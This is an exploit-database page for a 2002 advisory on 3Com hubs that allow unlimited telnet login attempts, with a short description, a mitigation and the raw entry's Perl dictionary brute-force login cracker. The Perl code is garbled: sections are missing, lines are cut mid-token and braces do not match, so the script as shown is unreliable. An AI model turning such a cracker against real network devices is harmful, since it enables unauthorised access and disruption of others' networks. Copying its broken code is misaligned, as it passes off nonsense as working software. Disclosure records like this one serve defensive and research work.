header-logo
Suggest Exploit
vendor:
3Com Hubs and Network Products
by:
Siberian - Sentry Research Labs
7.5
CVSS
HIGH
Brute-Force Login Attempts
N/A
CWE
Product Name: 3Com Hubs and Network Products
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

3Com Hardware Telnet Login Cracker

A vulnerability exists in certain models of 3Com hubs and potentially other 3Com network products. The affected devices fail to properly restrict the allowed number of login attempts to the inbuilt telnet-based administration interface from remote users. Attackers can use brute-force cracking techniques in obtaining access to 3Com telnetd config accounts. Exploiting this, a malicious user can interfere with the device's operation and configuration, creating denials of service and further compromising the network on which the device is installed.

Mitigation:

Restrict the allowed number of login attempts to the inbuilt telnet-based administration interface from remote users.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/3034/info

A vulnerability exists in certain models of 3Com hubs and potentially other 3Com network products.

The affected devices fail to properly restrict the allowed number of login attempts to the inbuilt telnet-based administration interface from remote users. Attackers can use brute-force cracking techniques in obtaining access to 3Com telnetd config accounts.

Exploiting this, a malicious user can interfere with the device's operation and configuration, creating denials of service and further compromising the network on which the device is installed. 

#!/usr/bin/perl -w

#######################esponsible for any damgae caused  #
# by the###########################################
rf, chr(13), chr(10);

recv(SOCK,$ol,1,0);
$passwd,0); 
   }
   recv(SOCK,$ol,1,0);
 $i++
}
$i=1;
}
print "\n\nIt's sad but true, you failed.\n";
}


print "\n3Com Hardware Telnet Login Cracker, written by Siberian \- Sentry Research Labs\n\n";
print "Get the latest Version at www.sentry-labs.com\n\n [target host] [dictionary] (username)";
$us= inet_aton($remote) or die "No target host computer found!";
$paddr = sockaddr_in(23, $iesspass();

close(FILE1);
close(SOCK);
exit 0;